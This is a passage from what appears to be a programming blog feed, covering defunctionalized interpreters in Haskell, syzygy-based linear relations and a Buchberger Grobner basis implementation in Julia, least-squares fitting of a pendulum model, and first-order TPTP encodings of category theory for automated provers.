needs to remember `vx`

and `k`

.

`data AHole = IdDone | AddL AExpr AHole | AddR Value AHole `

What functions *are* is a thing that can be applied to it’s arguments. We can use `AHole`

exactly as before by defining an `apply`

function.

```
apply :: AHole -> Value -> Value
apply IdDone v = v
apply (AddL e k) v = evald e (AddR v k)
apply (AddR v' k) v = apply k (v' + v)
```

And using this we can convert `evalk`

into a new form by replacing the continuations with their defunctionalized data type.

```
evald :: AExpr -> AHole -> Value
evald (Add x y) k = evald x (AddL y k)
evald (Lit i) k = apply k i
eval'' e = evald e IdDone
```

We can make this into more of a machine by inlining `apply`

into `evald`

and breaking up the tail recursion into individual steps. Now we have a step relation on a state consisting of continuation data `AHole`

and program information `AExpr`

. Every step makes progress towards evaluating the expression. If you squint a little, this machine is basically an RPN machine for evaluating arithmetic.

```
data Machine = Machine { prog :: AExpr , kont :: AHole}
step :: Machine -> Either Value Machine
step (Machine (Add x y) k) = Right $ Machine x (AddL y k)
step (Machine (Lit i) (AddL e k)) = Right $ Machine e (AddR i k)
step (Machine (Lit i) (AddR v k)) = Right $ Machine (Lit (i + v)) k
step (Machine (Lit i) (IdDone)) = Left i
init_machine e = Machine e IdDone
-- https://hackage.haskell.org/package/extra-1.7.4/docs/src/Control.Monad.Extra.html#loop
loop :: (a -> Either b a) -> a -> b
loop act x = case act x of
Right x -> loop act x
Left v -> v
eval'''' e = loop step (init_machine e)
```

Pretty neat right?

Now the next simplest steps in my opinion would be to add Booleans, Let expressions, and Print statements. Then after grokking that, I would attempt the CEK and Krivine Machines for lambda calculus.

Defunctionalizing arithmetic can be found in https://www.brics.dk/RS/01/23/BRICS-RS-01-23.pdf – Defunctionalization at Work – Danvy and Nielson

https://homepages.inf.ed.ac.uk/wadler/papers/papers-we-love/reynolds-definitional-interpreters-1998.pdf Definitional Interpreters for Higher Order Programming Languages – Reynolds 1972. The grand daddy paper of defunctionalization

https://tidsskrift.dk/brics/article/download/21784/19215 – A Journey from Interpreters to Compilers and Virtual Machines – Mads Sig Ager, Dariusz Biernacki, Olivier Danvy,

Jan Midtgaard

http://www.pathsensitive.com/2019/07/the-best-refactoring-youve-never-heard.html Best Refactoring You’ve never Heard of by Jimmy Koppel.

Xavier Leroy abstract machine slides https://xavierleroy.org/mpri/2-4/

https://caml.inria.fr/pub/papers/xleroy-zinc.pdf – Leroy’s description of the Zinc Machine

CEK machine – Matt Might http://matt.might.net/articles/cek-machines/

https://github.com/rain-1/continuations-study-group/wiki/Reading-List

https://semantic-domain.blogspot.com/2020/02/thought-experiment-introductory.html Neel Krishnaswami’s hypothetical compiler course.

]]>The idea is to reimplement the ideas here computing linear relations https://www.philipzucker.com/linear-relation-algebra-of-circuits-with-hmatrix/ There is a lot more context written in that post and probably necessary background for this one.

Linear relations algebra is a refreshing perspective for me on systems of linear equations. It has a notion of composition that seems, dare I say, almost as useful as matrix multiplication. Very high praise. This composition has a more bidirectional flavor than matrix multiplication as it a good fit for describing physical systems, in which interconnection always influences both ways.

In the previous post, I used nullspace computations as my workhorse. The nullspace operation allows one to switch between a constraint (nullspace) and a generator (span) picture of a vector subspace. The generator view is useful for projection and linear union, and the constraint view is useful for partial-composition and intersection. The implementation of linear relation composition requires flipping between both views.

I’m reimplementing it in Julia for 2 reasons

- To use the Julia ecosystems implementation of module operations
- to get a little of that Catlab.jl magic to shine on it.

It was a disappointment of the previous post that I could only treat resistor-like circuits. The new twist of using module packages allows treatment of inductor/capacitor circuits and signal flow diagrams.

When you transform into Fourier space, systems of linear differential equations become systems of polynomial equations . From this perspective, modules seem like the appropriate abstraction rather vector spaces. Modules are basically vector spaces where one doesn’t assume the operation of scalar division, in other words the scalar are rings rather than fields. Polynomials are rings, not fields. In order to treat the new systems, I still need to be able to do linear algebraic-ish operations like nullspaces, except where the entries of the matrix are polynomials rather than floats.

Syzygies are basically the module analog of nullspaces. Syzygies are the combinations of generators that combine to zero. Considering the generators of a submodule as being column vectors, stacking them together makes a matrix. Taking linear combinations of the columns is what happens when you multiply a matrix by a vector. So the syzygies are the space of vectors for which this matrix multiplication gives 0, the “nullspace”.

Computer algebra packages offer syzygy computations. Julia has bindings to Singular, which does this. I have been having a significant and draining struggle to wrangle these libraries though. Am I going against the grain? Did the library authors go against the grain? Here’s what I’ve got trying to match the catlab naming conventions:

```
using Singular
import Nemo
using LinearAlgebra # : I
CC = Nemo.ComplexField(64)
P, (s,) = PolynomialRing(CC, ["s"])
i = Nemo.onei(CC) # P(i) ? The imaginary number
#helpers to deal with Singular.jl
eye(m) = P.(Matrix{Int64}(I, m, m)) # There is almost certainly a better way of doing this. Actually dispatching Matrix?
zayro(m,n) = P.(zeros(Int64,m,n)) #new zeros method?
mat1(m::Int64) = fill(P(m), (1,1) )
mat1(m::Float64) = fill(P(m), (1,1) )
mat1(m::spoly{Singular.n_unknown{Nemo.acb}}) = fill(m, (1,1))
# Objects are the dimensionality of the vector space
struct DynOb
m::Int
end
# Linear relations represented
struct DynMorph
input::Array{spoly{Singular.n_unknown{Nemo.acb}},2}
output::Array{spoly{Singular.n_unknown{Nemo.acb}},2}
end
dom(x::DynMorph) = DynOb(size(x.input)[2])
codom(x::DynMorph) = DynOb(size(x.output)[2])
id(X::DynOb) = DynMorph(eye(X.m), -eye(X.m))
# add together inputs
plus(X::DynOb) = DynMorph( [eye(X.m) eye(X.m)] , - eye(X.m) )
mcopy(X::DynOb) = Dyn( [eye(X.m) ; eye(X.m)] , -eye(2*X.m) ) # copy input
delete(A::DynOb) = DynMorph( fill(P.(0),(0,A.m)) , fill(P.(0),(0,0)) )
create(A::DynOb) = DynMorph( fill(P.(0),(0,0)) , fill(P.(0),(0,A.m)) )
dagger(x::DynMorph) = DynMorph(x.output, x.input)
# cup and cap operators
dunit(A::DynOb) = compose(create(A), mcopy(A))
dcounit(A::DynOb) = compose(mmerge(A), delete(A))
scale(M) = DynMorph( mat1(M),mat1(-1))
diff = scale(i*s) # differentiation = multiplying by i omega
integ = dagger(diff)
#cupboy = DynMorph( [mat1(1) mat1(-1)] , fill(P.(0),(1,0)) )
#capboy = transpose(cupboy)
#terminal
# relational operations
# The meet
# Inclusion
# I think this is a nullspace calculation?
# almost all the code is trying to work around Singular's interface to one i can understand
function quasinullspace(A)
rows, cols = size(A)
vs = Array(gens(Singular.FreeModule(P, rows)))
q = [sum(A[:,i] .* vs) for i in 1:cols]
M = Singular.Module(P,q...)
S = Singular.Matrix(syz(M)) # syz is the only meat of the computation
return Base.transpose([S[i,j] for j=1:Singular.ncols(S), i=1:Singular.nrows(S) ])
end
function compose(x::DynMorph,y::DynMorph)
nx, xi = size(x.input)
nx1, xo = size(x.output)
@assert nx1 == nx
ny, yi = size(y.input)
ny1, yo = size(y.output)
@assert ny1 == ny
A = [ x.input x.output P.(zeros(Int64,nx,yo)) ;
P.(zeros(Int64,ny,xi)) y.input y.output ]
B = quasinullspace(A)
projB = [B[1:xi ,:] ;
B[xi+yi+1:end,:] ]
C = Base.transpose(quasinullspace(Base.transpose(projB)))
return DynMorph( C[:, 1:xi] ,C[:,xi+1:end] )
end
# basically the direct sum. The monoidal product of linear relations
function otimes( x::DynMorph, y::DynMorph)
nx, xi = size(x.input)
nx1, xo = size(x.output)
@assert nx1 == nx
ny, yi = size(y.input)
ny1, yo = size(y.output)
@assert ny1 == ny
return DynMorph( [ x.input P.(zeros(Int64,nx,yi));
P.(zeros(Int64,ny,xi)) y.input ],
[x.output P.(zeros(Int64,nx,yo));
P.(zeros(Int64,ny,xo)) y.output ])
end
```

I think this does basically work but it’s clunky.

I need to figure out Catlab’s diagram drawing abilities enough to show some circuits and some signal flow diagrams. Wouldn’t that be nice?

I should show concrete examples of composing passive filter circuits together.

There is a really fascinating paper by Jan Willems where he digs into a beautiful picture of this that I need to revisit https://homes.esat.kuleuven.be/~sistawww/smc/jwillems/Articles/JournalArticles/2007.1.pdf

https://golem.ph.utexas.edu/category/2018/06/the_behavioral_approach_to_sys.html

Is all this module stuff stupid? Should I just use rational polynomials and be done with it? Sympy? and are different equations, describing different behaviors. Am I even capturing that though? Is my syzygy powered composition even right? It seemed to work on a couple small examples and I think it makes sense. I dunno. Open to comments.

Because univariate polynomials are a principal ideal domain (pid), we can also use smith forms rather than syzygies is my understanding. Perhaps AbstractAlgebra.jl might be a better tool?

Will the syzygy thing be good for band theory? We’re in the multivariate setting then so smith normal form no longer applies.

]]>We’ve been building a raspberry pi controlled pendulum to be controlled from the internet and the problem came up of trying to get a simulation to match the physical pendulum.

We weighed the pendulum and calculated the torque due to gravity (you can think of it as the full force of gravity acting on the level arm of the center of the pole ) and moment of inertia of a rod about it’s end .

However, It is difficult to estimate the torque supplied by the motor. Motors have surprisingly complicated behavior. It is also difficult from first principles to estimate damping or friction terms.

There are a couple different experimental stratagems for a pendulum. One thing we tried was setting the pendulum on it’s side and setting the motor duty cycle to different values. From this you can fit a parabola to those curves and get a acceleration constant for the different motor settings. Experimentally speaking, it seemed roughly linear acceleration to motor PWM duty cycle.

Another stratagem is to take resonance curves for the pendulum. Try exciting it with different sinusoidal torques at a sweep of frequencies. From this curve you can recover a resonance frequency and damping coefficients.

These all make sense as kind of ersatz methods. We’re taking our intuitive understanding of the system and other results from simpler or related systems and combining them together.

An interesting alternative approach to the above is to drive the pendulum with a random torque and then fit a parameterized model of the equations of motion to the observed acceleration. The model should include at the least the gravity term, motor torque term , and a damping terms . A simple start is . This is a linear model with respect to the coefficients and can be solved by least squares.

I’ve come to appreciate sci-kit learn for fitting. It doesn’t have the hottest most high falutin’ fads, but it’s got a lot of good algorithms in it that just work, are damn easy to use, and are easy to swap different possibilities out of there. Even though I know how to more manually set up a least squares system or solve a LASSO problem via cvxpy, it makes it really easy and clean. I’ve started reaching for it for fast attacks on fitting problems.

We mocked out our interface to behave similarly to an OpenAI gym interface. Because of this, the observations already have the cosine and sine terms that might be of interest and the angular velocity value that would be used for a simple damping term .

```
import gym
import time
import numpy as np
env = gym.make('pendulum-v0')
observation = env.reset()
action = 0
dt = 0.05
obs = []
rews = []
actions = []
for i in range(1000):
# A random walk for actions.
# we need the actions to be slow changing enough to see trends
# but fast enough to see interesting behavior
# tune this by hand
action += np.random.randn() * dt
action = max( min(action, 2 ), -2)
observation, reward, done, info = env.step([action])
obs.append(observation)
actions.append(action)
rews.append(reward)
time.sleep(0.05)
obs = np.array(obs) # obs includes thetadot, cos(theta), sin(theta). A good start.
actions = np.array(actions) # the pwm value used
# data to predict alpha from. Each row is a data point from one time step.
X = np.hstack( (obs[:-1, :] , actions[:-1].reshape(-1,1)) )
alphas = (obs[1:,2] - obs[:-1,2] ) / dt #angular acceleration
# feel free to swap in LASSO or other regressors
from sklearn.linear_model import LinearRegression
# fit the observed angular acceleration as a function of X
reg = LinearRegression().fit(X, alphas)
print(f"intercept : {reg.intercept_}, coeffs : {reg.coef_} ")
```

The number that came out for gravity term matched the number calculated from first principles by within 10%. Not bad!

A thing that is nice about this approach is that one is able to add terms into the dynamics for which we don’t have good intuitive models to compare to like your good ole Physics I Coulombic friction term or nonlinearities.

]]>- Linkages
- Geometrical Theorem proving. Circles are x^2 + y^2 – 1 = 0 and so on.
- Optics
- Constraint satisfaction problems. x^2 – 1 = 0 gives you a boolean variable. It’s a horrible method but it works if your computer doesn’t explode.
- Energy and momentum conservation. “Classical Feynman Diagrams” p1 + p2 = p3 + p4 and so on.
- Frequency domain circuits and linear dynamical systems more on this another day

To learn more about Grobner bases I highly recommend Cox Little O’Shea

To understand what a Grobner basis is, first know that univariate polynomial long division is a thing. It’s useful for determining if one polynomial is a multiple of another. If so, then you’ll find the remainder is zero.

One could want to lift the problem of determining if a polynomial is a multiple of others to multivariate polynomials. Somewhat surprisingly the definition of long division has some choice in it. Sure, x^2 is a term that is ahead of x, but is x a larger term than y? y^2? These different choices are admissible. In addition now one has systems of equations. Which equation do we divide by first? It turns out to matter and change the result. That is unless one has converted into a Grobner Basis.

A Grobner basis is a set of polynomials such that remainder under multinomial division becomes unique regardless of the order in which division occurs.

How does one find such a basis? In essence kind of by brute force. You consider all possible polynomials that could divide two ways depending on your choice.

Julia has packages for multivariate polynomials. https://github.com/JuliaAlgebra/MultivariatePolynomials.jl defines an abstract interface and generic functions. DynamicPolynomials gives flexible representation for construction. TypedPolynomials gives a faster representation.

These already implement a bulk of what we need to get a basic Buchberger going: Datastructures, arithmetic, and division with remainder. With one caveat, there is already a picked monomial ordering. And it’s not lexicographic, which is the nice one for eliminating variables. This would not be too hard to change though?

Polynomial long division with respect to a set of polynomials is implemented here

Unfortunately, (or fortunately? A good learning experience. Learned some stuff about datastructures and types in julia so that’s nice) quite late I realized that a very similar Grobner basis algorithm to the below is implemented inside of of SemiAlgebraic.jl package. Sigh.

```
using MultivariatePolynomials
using DataStructures
function spoly(p,q)
pq = lcm(leadingmonomial(p),leadingmonomial(q))
return div( pq , leadingterm(p) ) * p - div(pq , leadingterm(q)) * q
end
function isgrobner(F::Array{T}) where {T <: AbstractPolynomialLike} # check buchberger criterion
for (i, f1) in enumerate(F)
for f2 in F[i+1:end]
s = spoly(f1,f2)
_,s = divrem(s,F)
if !iszero(s)
return false
end
end
end
return true
end
function buchberger(F::Array{T}) where {T <: AbstractPolynomialLike}
pairs = Queue{Tuple{T,T}}()
# intialize with all pairs from F
for (i, f1) in enumerate(F)
for f2 in F[i+1:end]
enqueue!(pairs, (f1,f2))
end
end
# consider all possible s-polynomials and reduce them
while !isempty(pairs)
(f1,f2) = dequeue!(pairs)
s = spoly(f1,f2)
_,s = divrem(s,F)
if !iszero(s) #isapproxzero? Only add to our set if doesn't completely reduce
for f in F
enqueue!(pairs, (s,f))
end
push!(F,s)
end
end
# reduce redundant entries in grobner basis.
G = Array{T}(undef, 0)
while !isempty(F)
f = pop!(F)
_,r = divrem(f, vcat(F,G))
if !iszero(r)
push!(G,r)
end
end
return G
end
```

Some usage. You can see here that Gaussian elimination implemented by the backslash operator is a special case of taking the Grobner basis of a linear set of equations

```
using DynamicPolynomials
@polyvar x y
buchberger( [ x + 1.0 + y , 2.0x + 3y + 7 ] )
#=
2-element Array{Polynomial{true,Float64},1}:
-0.5y - 2.5
x - 4.0
=#
[ 1 1 ; 2 3 ] \ [-1 ; -7]
#=
2-element Array{Float64,1}:
4.0
-5.0
=#
buchberger( [ x^3 - y , x^2 - x*y ])
#=
3-element Array{Polynomial{true,Int64},1}:
-xy + y²
y³ - y
x² - y²
=#
```

Many. This is not a good Buchberger implementation, but it is simple. See http://www.scholarpedia.org/article/Buchberger%27s_algorithm for some tips, which include criterion for avoiding unneeded spolynomial pairs, and smart ordering. Better Buchberger implementations will use the f4 or f5 algorithm, which use sparse matrix facilities to perform many division steps in parallel. My vague impression of this f4 algorithm is that you prefill a sparse matrix (rows correspond to an spolynomial or monomial multiple of your current basis, columns correspond to monomials) with monomial multiples of your current basis that you know you might need.

In my implementation, I’m tossing away the div part of `divrem`

. It can be useful to retain these so you know how to write your Grobner basis in terms of the original basis.

You may want to look at the julia bindings to Singular.jl

- https://mattpap.github.io/masters-thesis/html/src/groebner.html
- https://www-polsys.lip6.fr/~jcf/FGb/index.html
- https://github.com/wbhart/Singular.jl
- https://www.philipzucker.com/dump-of-nonlinear-algebra-algebraic-geometry-notes-good-links-though/
- https://www.philipzucker.com/computing-syzygy-modules-in-sympy/
- https://www.philipzucker.com/grobner-bases-and-optics/
- https://scicomp.stackexchange.com/questions/21699/benchmarks-for-gr%c3%b6bner-bases-and-polynomial-system-solution
- https://mathoverflow.net/questions/322518/computing-groebner-basis-for-a-complicated-systems-of-polynomials
- https://cstheory.stackexchange.com/questions/12326/unification-and-gaussian-elimination
- https://homepage.divms.uiowa.edu/~fleck/181content/taste-fixed.pdf
- http://www.scholarpedia.org/article/Buchberger%27s_algorithm
- https://doc.sagemath.org/html/en/reference/polynomial_rings/sage/rings/polynomial/toy_buchberger.html
- Operads grobner https://www.maths.tcd.ie/~vdots/AlgebraicOperadsAnAlgorithmicCompanion.pdf What the heck. From Evan’s site https://www.epatters.org/wiki/algebra/computational-category-theory.html
- https://github.com/tkluck/FGb.jl

There are a number of projects formalizing category theory in these systems

- https://github.com/agda/agda-categories
- https://github.com/statebox/idris-ct
- https://github.com/jwiegley/category-theory
- https://arxiv.org/pdf/1401.7694.pdf
- https://www.isa-afp.org/ search for category. There are a couple.
- https://mathoverflow.net/questions/152497/formalizations-of-category-theory-in-proof-assistants – Thanks to Eduardo Ochs for pointing this out
- Many more

All of these systems are using some variant of higher order logic where you can quantify over propositions. This is very expressive, but also are more difficult to automate (They *do* have significant automation in them though, but this tends to be for filling in the relatively obvious intermediate details of a proof, not complete automation). Perhaps this has some relation to Godel’s incompleteness theorem

There are other classes of theorem proving systems: automatic theorem provers and SMT solvers. Can we do category theory in them? Doesn’t Automatic sound real nice in principle?

ATP and SMT are similar in some respects but are architected differently and have slightly different use cases and strengths:

- SMT solvers are based around SAT solvers and tractable sub problems (theories). They have subsystems that deeply understand linear equations, linear inequalities, systems of polynomials, theory of uninterpreted functions, bit-blasting, others. They combine these facilities via the Nelson-Oppen procedure. They are fairly weak at quantifier reasoning. They are good at problems that require lots of domain specific understanding. Examples of SMT solvers include Z3, CVC4, Alt Ergo, Boolector. You can find more and comparisons at the SMT competition
- While the term Automatic Theorem Prover (ATP) could mean anything, it has a tendency to denote a class of first order logic solvers based around resolution. Examples of such provers include Vampire, E, and Prover9. You can find more at the CADE competition. They are more oriented to abstract first order logic structures and quantifier reasoning.

A big downside of automatic methods is that once they start to fail, you’re more hosed than the interactive provers. Until then, it’s great though.

Category theory proofs have a feeling of being close to trivial (at least the ones I’ve seen, but I’ve mostly seen the trivial ones so…? ), amounting to laboriously expanding definitions and rewrite equations corresponding to commutation conditions. An automatic system to verify these seems useful.

What are the kinds of questions one wants to ask these provers?

- Confirmation that a concrete mathematical structure (integers, reals, bools, abstract/concrete preorder, group, lattice) obeys the required categorical axioms/interface. The axioms of category structures are the
*conjectures*here - Confirmation that abstract categorical constructions do what they’re supposed to. One presupposes categorical axioms and structures and asks conjecture conclusions. For example, given this square, does this other diagram commute? Is this “diagram chasing“?

These are yes/no questions. Although in the case of no, often a counterexample is emitted which can help show where you went awry. A third task that is more exciting to me, but harder and not an obvious stock capability of these provers is

- Calculate/construct something categorical. For example, we might want to construct a condensed or efficient version of some program given by a categorical spec, or emit a categorical construction that has certain properties. There are clear analogies with program verification vs. program synthesis.

Now it appears that to some degree this is possible. I have noted that in the proof output, one can sometimes find terms that may correspond to the thing you desire, especially if you ask an existential conjecture, “does there exists a morphism with such and such a property”.

TPTP is both a problem library and specification language for first order problems for the purposes of computer provers. There is a nice overview video here. There is a nice web interface to explore different provers here. The TPTP library contains four different axiomatizations for categories, and a number of problems

- http://www.tptp.org/cgi-bin/SeeTPTP?Category=Axioms&File=CAT001-0.ax
- http://www.tptp.org/cgi-bin/SeeTPTP?Category=Axioms&File=CAT002-0.ax
- http://www.tptp.org/cgi-bin/SeeTPTP?Category=Axioms&File=CAT003-0.ax
- http://www.tptp.org/cgi-bin/SeeTPTP?Category=Axioms&File=CAT004-0.ax

There is a good set of videos explaining how to formalize category axioms in a first order setting. https://www.youtube.com/watch?v=NjDZMWdDJKM&list=PL4FD0wu2mjWOtmhJsiVrCpzOAk42uhdz8&index=6&t=0s he has a couple different formulation actually. It’s interesting. Here’s a stack overflow https://math.stackexchange.com/questions/2383503/category-theory-from-the-first-order-logic-point-of-view along with a small discussion of why it’s wrong headed to even do such a thing. I’m not sure I agree with the second part.

Here is my encoding. I am not 100% confident anything I’ve done here is right. Note that composition is expressed as a ternary relation. This is one way of handling the fact that without stronger typing discipline, composition is a* partial* binary function. In order to compose, morphisms need to meet on an intermediate object. Categorical “typing” is expressed via logical constraint on the relation.

A trick one can use is to identify the identity arrows and the objects at which they are based. Since every object is required to have an identity arrow and every identity arrow points from and to a single object, they are in isomorphism. There is some conceptual disclarity that occurs from this trick though. I’m not totally sold.

TPTP syntax is mostly straightforward but note that ! [X] is forall X, ? [X] is exists X, capital names are variables, lowercase names are constants. Quantifiers bind tighter than I personally expected, hence my parenthesis explosion.

```
% axioms of a category
% we would resupply this for every category involved?
% ! [X] is forall X, ? [X] is exists X. Capital names are variables
% lowercase names are constants.
fof( dom_cod, axiom, ![X] : dom(cod(X)) = cod(X)).
fof( cod_dom, axiom, ![X] : cod(dom(X)) = dom(X)).
fof( comp_is_unique, axiom, ![F, G, FG1, FG2] : ((comp(F,G,FG1) & comp(F,G,FG2)) => FG1 = FG2) ).
fof( comp_objects_middle, axiom, ![F, G] : ((? [FG] : comp(F,G,FG)) <=> dom(F) = cod(G))).
fof( comp_dom, axiom, ![F, G, FG] : (comp(F,G,FG) => dom(G) = dom(FG))).
fof( comp_cod, axiom, ![F, G, FG] : (comp(F,G,FG) => cod(F) = cod(FG))).
fof( left_id, axiom, ![F] : comp(cod(F),F,F) ).
fof( right_id, axiom, ![F] : comp(F,dom(F),F) ).
% I've heard that composition axioms cause churn?
fof( comp_assoc, axiom, ![F, G, H, FG, GH, FGH1, FGH2] : ((comp(F,G,FG) & comp(FG,H,FGH1) & comp(F,GH,FGH2) & comp(G,H,GH)) => FGH1 = FGH2 )).
```

Here are some definitions. One could also just inline these definitions with a macro system. Uniqueness quantification occurs in universal properties. It’s sort of a subtle idea to encode into ordinary first order logic without uniqueness quantification. Are some encoding better than others? Another place where macros to generate TPTP files would be useful. Uniqueness quantification is naturally expressible as a higher order predicate.

```
fof(monic_def, axiom,
![M] : (monic(M) <=> (! [F,G] : (( ? [H] : (comp(M, F, H) & comp(M,G,H))) => F = G)))).
fof(commute_square_def, axiom,
![F,G,H,K] : (commute_square(F,G,H,K) <=> (? [M] : (comp(F,G,M) & comp(H,K,M))))).
fof(pullback_def, axiom,
![F,G,P1,P2] : (pullback(F,G,P1,P2) <=>
(commute_square(F,P1,G,P2) &
(![Q1,Q2] : (commute_square(F,Q1,G,Q2) =>
(?[U] : (! [U1] : ((comp(P1,U1,Q1) & comp(P2,U1,Q2)) <=> (U1 = U))))
))))).
```

Here are some pretty simple problems:

```
% should be a trivial statement, but isn't literally an axiom.
fof( codcod, conjecture, ![F] : cod(cod(F)) = cod(F) ).
% paste two commuting squares together gives another commuting square
fof( pasting_square,conjecture, ![A,B,C,D, I,J,K, BI, CJ] : ((commute_square(B,A,D,C) & commute_square(I,D,K,J) & comp(I,B, IB) & comp( J, C,JC))
=> commute_square( IB,A, K,JC ) )).
```

One theorem that is not quite so trivial is the pullback of a monic is monic https://math.stackexchange.com/questions/2957202/proving-the-pullback-of-monics-is-monic. It’s ultimately not that complicated and yet difficult enough that it takes me a lot of head scratching. It crucially uses the uniqueness property of the pullback. Here’s an encoding of the conjecture.

```
include('cat.tptp').
include('constructions.tptp').
% warmup?
%fof(pullback_monic, conjecture, ![M, P1,P2] : ((monic(M) & pullback(cod(M),M,P1,P2)) => %monic(P2))).
% pullback of monic is monic
fof(pullback_monic, conjecture, ![M, F, P1,P2] : ((monic(M) & pullback(F,M,P1,P2)) => monic(P1))).
```

Invoking the prover.

`eprover --auto-schedule --cpu-limit=60 --proof-object monic_pullback.tptp`

Vampire appears to do it faster. Again the easiest way to try it yourself or compare other solvers is the web interface System on TPTP http://www.tptp.org/cgi-bin/SystemOnTPTP. Caveat: given how many times I’ve screwed up writing this post, I’d give a 40% chance that that final theorem is actually expressing what I intended it to.

Encoding our questions into first order logic, which is powerful but not fully expressive, requires a lot of “macro” like repetitiveness when possible at all. I have found through experience that the extra macro capabilities given by python for emitting Z3 problems to be extremely powerful. For this reason, we should use a real programming language to emit these problems. I think the logical candidate is Julia and the Catlab library. One unknown question, will this repetitiveness choke the theorem prover?

Categorical Constructions that one might want to encode:

- Monic
- Epic
- Commuting Squares
- Pullbacks
- Pushouts
- products
- coproducts
- exponential objects
- Subobject classifiers
- Finite categories
- Functors
- Natural transformations
- Adjunctions
- Kan Extensions
- PreSheaves

Theorems that seem possible. (Surely there are many more.

- The pullback of a monic is monic
- five lemma,
- the snake lemma,
- the zig-zag lemma,
- and the nine lemma.
- https://www.cs.le.ac.uk/people/rlc3/research/papers/mgs2015-categoryTheory-exercises.pdf
- https://math.stackexchange.com/questions/54583/looking-for-students-guide-to-diagram-chasing

Some observations on actually using these provers: Just because it says proved is not very convincing. It is very easy to have your axioms and/or conjecture stated incorrectly. Forall ! and Exists ? bind tighter than I naively expect them to in the syntax. I ended up putting parenthesis nearly everywhere. I had a lot of very difficult to debug problems due to bad binding assumptions. Typos are also a disaster. These things are hard to debug. It is helpful to alternatively ask for satisfiability (disproving the conjecture). One should also at least look at which axioms it’s using. If it is using less axioms than makes sense, something is up. These are all good reasons that it might be better to automatically generate these problem files. Ultimately I feel like that is the way to go, because encoding what you’re interested in into first order logic can require some repetitiveness.

Sanity checking my files with http://www.tptp.org/cgi-bin/SystemB4TPTP proved to be helpful. Also looking at the parenthesis structure in the output.

I think using the typed tff format could also help sanity significantly. It really sucks that a typo on one of your predicates or variables can fail silently.

Even ignoring syntax screwups, the scoping of quantifiers is tough to think about.

I suspect that these systems will be very good for proofs that amount to unrolling definitions.

What is the best formulation for category theory properties?

An interesting property is that these provers seem to want a time limit given to them. And they schedule themselves in such a way to use the full time limit, even if they shouldn’t need it.

Categorical “type checking” as an external predicate. In order to compose, morphisms need to meet on an intermediate object.

The proof output is rather difficult to read. It is the equivalent of trying to read assembly code. The high level structure has been transformed into something more amenable to the machine and many names have been mangled. This proof is short enough that I think a person could stare at it for a while an eventually kind of understand it.

Perhaps we want to directly input our constructions in cnf form with skolemization manually applied. This might make the output more readable?

In terms of automated category theory proving, I’m not aware of that much work, but there must be more that I don’t know how to find.

- https://www.cs.cornell.edu/~kozen/Papers/06ijcar-categories.pdf
- https://www.cambridge.org/core/books/categories-and-computer-science/203EBBEE29BEADB035C9DD80191E67B1
- http://www.cs.man.ac.uk/~david/categories/book/book.pdf

Example proof term: Is this even right? Hard to know.

```
# Proof found!
# SZS status Theorem
# SZS output start CNFRefutation
fof(pullback_monic, conjecture, ![X11, X13, X14]:((monic(X11)&pullback(cod(X11),X11,X13,X14))=>monic(X14)), file('properties.tptp', pullback_monic)).
fof(pullback_def, axiom, ![X2, X3, X13, X14]:(pullback(X2,X3,X13,X14)<=>(commute_square(X2,X13,X3,X14)&![X15, X16]:(commute_square(X2,X15,X3,X16)=>?[X17]:![X18]:((comp(X13,X18,X15)&comp(X14,X18,X16))<=>X18=X17)))), file('properties.tptp', pullback_def)).
fof(commute_square_def, axiom, ![X2, X3, X7, X12]:(commute_square(X2,X3,X7,X12)<=>?[X11]:(comp(X2,X3,X11)&comp(X7,X12,X11))), file('properties.tptp', commute_square_def)).
fof(comp_objects_middle, axiom, ![X2, X3]:(?[X6]:comp(X2,X3,X6)<=>dom(X2)=cod(X3)), file('cat.tptp', comp_objects_middle)).
fof(dom_cod, axiom, ![X1]:dom(cod(X1))=cod(X1), file('cat.tptp', dom_cod)).
fof(left_id, axiom, ![X2]:comp(cod(X2),X2,X2), file('cat.tptp', left_id)).
fof(comp_is_unique, axiom, ![X2, X3, X4, X5]:((comp(X2,X3,X4)&comp(X2,X3,X5))=>X4=X5), file('cat.tptp', comp_is_unique)).
fof(monic_def, axiom, ![X11]:(monic(X11)<=>![X2, X3]:(?[X7]:(comp(X11,X2,X7)&comp(X11,X3,X7))=>X2=X3)), file('properties.tptp', monic_def)).
fof(comp_cod, axiom, ![X2, X3, X6]:(comp(X2,X3,X6)=>cod(X2)=cod(X6)), file('cat.tptp', comp_cod)).
fof(comp_dom, axiom, ![X2, X3, X6]:(comp(X2,X3,X6)=>dom(X3)=dom(X6)), file('cat.tptp', comp_dom)).
fof(comp_assoc, axiom, ![X2, X3, X7, X6, X8, X9, X10]:((((comp(X2,X3,X6)&comp(X6,X7,X9))&comp(X2,X8,X10))&comp(X3,X7,X8))=>X9=X10), file('cat.tptp', comp_assoc)).
fof(c_0_11, negated_conjecture, ~(![X11, X13, X14]:((monic(X11)&pullback(cod(X11),X11,X13,X14))=>monic(X14))), inference(assume_negation,[status(cth)],[pullback_monic])).
fof(c_0_12, plain, ![X68, X69, X70, X71, X72, X73, X75, X76, X77, X78, X79, X80, X83]:(((commute_square(X68,X70,X69,X71)|~pullback(X68,X69,X70,X71))&((~comp(X70,X75,X72)|~comp(X71,X75,X73)|X75=esk7_6(X68,X69,X70,X71,X72,X73)|~commute_square(X68,X72,X69,X73)|~pullback(X68,X69,X70,X71))&((comp(X70,X76,X72)|X76!=esk7_6(X68,X69,X70,X71,X72,X73)|~commute_square(X68,X72,X69,X73)|~pullback(X68,X69,X70,X71))&(comp(X71,X76,X73)|X76!=esk7_6(X68,X69,X70,X71,X72,X73)|~commute_square(X68,X72,X69,X73)|~pullback(X68,X69,X70,X71)))))&((commute_square(X77,esk8_4(X77,X78,X79,X80),X78,esk9_4(X77,X78,X79,X80))|~commute_square(X77,X79,X78,X80)|pullback(X77,X78,X79,X80))&((~comp(X79,esk10_5(X77,X78,X79,X80,X83),esk8_4(X77,X78,X79,X80))|~comp(X80,esk10_5(X77,X78,X79,X80,X83),esk9_4(X77,X78,X79,X80))|esk10_5(X77,X78,X79,X80,X83)!=X83|~commute_square(X77,X79,X78,X80)|pullback(X77,X78,X79,X80))&((comp(X79,esk10_5(X77,X78,X79,X80,X83),esk8_4(X77,X78,X79,X80))|esk10_5(X77,X78,X79,X80,X83)=X83|~commute_square(X77,X79,X78,X80)|pullback(X77,X78,X79,X80))&(comp(X80,esk10_5(X77,X78,X79,X80,X83),esk9_4(X77,X78,X79,X80))|esk10_5(X77,X78,X79,X80,X83)=X83|~commute_square(X77,X79,X78,X80)|pullback(X77,X78,X79,X80)))))), 